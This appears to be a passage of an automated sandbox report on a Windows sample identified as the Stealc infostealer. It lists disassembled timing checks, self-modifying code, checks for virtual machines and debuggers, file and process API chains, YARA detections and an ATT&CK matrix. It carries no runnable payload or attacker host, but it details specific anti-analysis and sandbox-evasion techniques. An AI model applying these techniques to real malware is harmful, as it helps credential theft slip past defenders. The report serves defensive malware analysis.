              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C95F9D second address: C95FB0 instructions: 0x00000000 rdtsc 0x00000002 js 00007F0B48B8DEE8h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C95FB0 second address: C95FB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C95FB4 second address: C95FC7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0B48B8DEEFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C95FC7 second address: C95FCC instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C95FCC second address: C9604B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push eax 0x0000000b call 00007F0B48B8DEE8h 0x00000010 pop eax 0x00000011 mov dword ptr [esp+04h], eax 0x00000015 add dword ptr [esp+04h], 0000001Dh 0x0000001d inc eax 0x0000001e push eax 0x0000001f ret 0x00000020 pop eax 0x00000021 ret 0x00000022 mov dword ptr [ebp+122D306Bh], edx 0x00000028 sub edx, dword ptr [ebp+1244E0F3h] 0x0000002e push 00000004h 0x00000030 push 00000000h 0x00000032 push ebp 0x00000033 call 00007F0B48B8DEE8h 0x00000038 pop ebp 0x00000039 mov dword ptr [esp+04h], ebp 0x0000003d add dword ptr [esp+04h], 00000019h 0x00000045 inc ebp 0x00000046 push ebp 0x00000047 ret 0x00000048 pop ebp 0x00000049 ret 0x0000004a mov dword ptr [ebp+122D1B4Dh], edx 0x00000050 mov dword ptr [ebp+122D1D2Bh], edi 0x00000056 push 701DE064h 0x0000005b push eax 0x0000005c push edx 0x0000005d push ecx 0x0000005e jmp 00007F0B48B8DEEEh 0x00000063 pop ecx 0x00000064 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C9604B second address: C96051 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C98D82 second address: C98D8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C98D8D second address: C98D91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C9AC19 second address: C9AC1D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 530029C second address: 53002A7 instructions: 0x00000000 rdtsc 0x00000002 mov si, 64A7h 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53002A7 second address: 53002B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 popad 0x00000006 xchg eax, ebp 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a mov di, 5384h 0x0000000e push edx 0x0000000f pop eax 0x00000010 popad 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53002B8 second address: 53002BE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53002BE second address: 53002C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53002C2 second address: 53002D0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c mov dh, 74h 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53002D0 second address: 53002DA instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ecx 0x00000009 pop edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53002DA second address: 530032E instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F0B48765F2Ah 0x00000008 or esi, 59C62368h 0x0000000e jmp 00007F0B48765F2Bh 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 popad 0x00000017 xchg eax, ebp 0x00000018 jmp 00007F0B48765F36h 0x0000001d mov ebp, esp 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007F0B48765F37h 0x00000026 rdtsc
              Tries to evade debugger and weak emulator (self modifying code)
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 9FFB6E instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 9FFAB3 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: BA23E0 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 9FD646 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: BB1D2E instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: C31FFF instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
              Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
              Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
              Source: C:\Users\user\Desktop\file.exeEvaded block: after key decisiongraph_0-27321
              Source: C:\Users\user\Desktop\file.exeEvasive API call chain: GetSystemTime,DecisionNodesgraph_0-27389
              Source: C:\Users\user\Desktop\file.exeAPI coverage: 4.2 %
              Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007C18A0 lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_007C18A0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007C3910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,DeleteFileA,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_007C3910
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007C1269 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_007C1269
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007C1250 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_007C1250
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007CE210 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_007CE210
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007C4B29 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,0_2_007C4B29
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007C4B10 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_007C4B10
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007CCBE0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,CreateFileA,GetFileSizeEx,CloseHandle,CloseHandle,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_007CCBE0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007C23A9 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,0_2_007C23A9
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007BDB99 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_007BDB99
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007C2390 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,0_2_007C2390
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007BDB80 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,GetFileAttributesA,StrCmpCA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_007BDB80
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007CD530 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_007CD530
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007CDD30 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,lstrcpy,0_2_007CDD30
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007B16B9 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,0_2_007B16B9
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007B16A0 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_007B16A0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007D1BF0 lstrcpy,ExitProcess,GetSystemInfo,ExitProcess,GetUserDefaultLangID,ExitProcess,ExitProcess,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,OpenEventA,CloseHandle,Sleep,OpenEventA,CreateEventA,CloseHandle,ExitProcess,0_2_007D1BF0
              Source: file.exe, file.exe, 00000000.00000002.2156415774.0000000000B81000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
              Source: file.exe, 00000000.00000002.2157021332.0000000001498000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2157021332.00000000014B3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: file.exe, 00000000.00000002.2157021332.000000000143E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
              Source: file.exe, 00000000.00000002.2157021332.0000000001487000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWH
              Source: file.exe, 00000000.00000002.2156415774.0000000000B81000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
              Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-26146
              Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-26133
              Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-25979
              Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-26126
              Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-25998
              Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

              Anti Debugging

              barindex
              Hides threads from debuggers
              Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
              Tries to detect sandboxes and other dynamic analysis tools (window names)
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: regmonclass
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: gbdyllo
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: procmon_window_class
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: ollydbg
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: filemonclass
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\Desktop\file.exeFile opened: NTICE
              Source: C:\Users\user\Desktop\file.exeFile opened: SICE
              Source: C:\Users\user\Desktop\file.exeFile opened: SIWVID
              Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007B4A60 VirtualProtect 00000000,00000004,00000100,?0_2_007B4A60
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007D6390 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_007D6390
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007D6390 mov eax, dword ptr fs:[00000030h]0_2_007D6390
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007D2A40 GetProcessHeap,RtlAllocateHeap,GetUserNameA,0_2_007D2A40
              Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
              Source: C:\Users\user\Desktop\file.exeMemory protected: page guardJump to behavior

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Yara detected Powershell download and execute
              Source: Yara matchFile source: Process Memory Space: file.exe PID: 5940, type: MEMORYSTR
              Searches for specific processes (likely to inject)
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007D4610 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,Process32Next,CloseHandle,0_2_007D4610
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007D46A0 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,OpenProcess,TerminateProcess,CloseHandle,Process32Next,CloseHandle,0_2_007D46A0
              Source: file.exe, file.exe, 00000000.00000002.2156415774.0000000000B81000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: +N;Program Manager
              Source: C:\Users\user\Desktop\file.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,0_2_007D2D60
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007D2B60 GetProcessHeap,RtlAllocateHeap,GetLocalTime,wsprintfA,0_2_007D2B60
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007D2A40 GetProcessHeap,RtlAllocateHeap,GetUserNameA,0_2_007D2A40
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007D2C10 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,0_2_007D2C10

              Stealing of Sensitive Information

              barindex
              Yara detected Stealc
              Source: Yara matchFile source: 00000000.00000002.2156214368.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2157021332.000000000143E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.2116004330.0000000005160000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: file.exe PID: 5940, type: MEMORYSTR
              Source: Yara matchFile source: dump.pcap, type: PCAP

              Remote Access Functionality

              barindex
              Yara detected Stealc
              Source: Yara matchFile source: 00000000.00000002.2156214368.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2157021332.000000000143E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.2116004330.0000000005160000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: file.exe PID: 5940, type: MEMORYSTR
              Source: Yara matchFile source: dump.pcap, type: PCAP

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
              Command and Scripting Interpreter              		1
              Create Account              		11
              Process Injection              		1
              Masquerading              		OS Credential Dumping2
              System Time Discovery              		Remote Services1
              Archive Collected Data              		2
              Encrypted Channel              		Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts13
              Native API              		1
              DLL Side-Loading              		1
              DLL Side-Loading              		33
              Virtualization/Sandbox Evasion              		LSASS Memory641
              Security Software Discovery              		Remote Desktop ProtocolData from Removable Media2
              Ingress Tool Transfer              		Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
              Disable or Modify Tools              		Security Account Manager33
              Virtualization/Sandbox Evasion              		SMB/Windows Admin SharesData from Network Shared Drive2
              Non-Application Layer Protocol              		Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
              Process Injection              		NTDS13
              Process Discovery              		Distributed Component Object ModelInput Capture12
              Application Layer Protocol              		Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
              Deobfuscate/Decode Files or Information              		LSA Secrets1
              Account Discovery              		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts3
              Obfuscated Files or Information              		Cached Domain Credentials1
              System Owner/User Discovery              		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
              Software Packing              		DCSync1
              File and Directory Discovery              		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
              DLL Side-Loading              		Proc Filesystem324
              System Information Discovery              		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet

              Screenshots

              Thumbnails

